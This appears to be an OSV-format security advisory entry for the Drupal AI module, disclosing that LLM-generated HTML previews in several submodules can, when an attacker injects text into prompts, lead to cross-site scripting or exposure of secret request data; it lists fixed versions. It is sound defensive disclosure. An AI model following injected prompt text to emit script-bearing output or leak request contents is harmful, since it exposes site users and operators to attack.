DRUPAL-CONTRIB-2026-054

See a problem?

Import Source

https://github.com/DrupalSecurityTeam/drupal-advisory-database/blob/main/advisories/ai/DRUPAL-CONTRIB-2026-054.json

JSON Data

https://api.osv.dev/v1/vulns/DRUPAL-CONTRIB-2026-054

Aliases

CVE-2026-13234

Published

2026-06-24T18:36:54Z

Modified

2026-06-24T19:15:04.330568065Z

Summary

[none]

Details

The module and certain submodules (AI Automators, AI Translate, AI API Explorer, AI Content Suggestions) provide the ability to use an LLM to generate HTML or Markdown and preview it in a browser.

Under certain circumstances, rendering of this HTML can lead to Cross Site Scripting, or exposing secret communications in the context of the LLM request.

This vulnerability is mitigated by the fact that an attacker must be able to inject text into prompts to create an attack.

References

https://www.drupal.org/sa-contrib-2026-054

Credits

- Drew Webber (mcdruid)
- - https://www.drupal.org/u/mcdruid

Affected packages

Packagist:https://packages.drupal.org/8 / drupal/ai

Package

Name: drupal/ai
Purl: pkg:composer/drupal%2Fai

Affected ranges

Type

ECOSYSTEM

Events

Introduced

Fixed

1.2.17

Database specific

{
    "constraint": "<1.2.17"
}

Type

ECOSYSTEM

Events

Introduced

1.3.0

Fixed

1.3.8

Database specific

{
    "constraint": ">=1.3.0 <1.3.8"
}

Type

ECOSYSTEM

Events

Introduced

1.4.0

Fixed

1.4.3

Database specific

{
    "constraint": ">=1.4.0 <1.4.3"
}

Database specific

source

"https://github.com/DrupalSecurityTeam/drupal-advisory-database/blob/main/advisories/ai/DRUPAL-CONTRIB-2026-054.json"

affected_versions

"<1.2.17 || >=1.3.0 <1.3.8 || >=1.4.0 <1.4.3"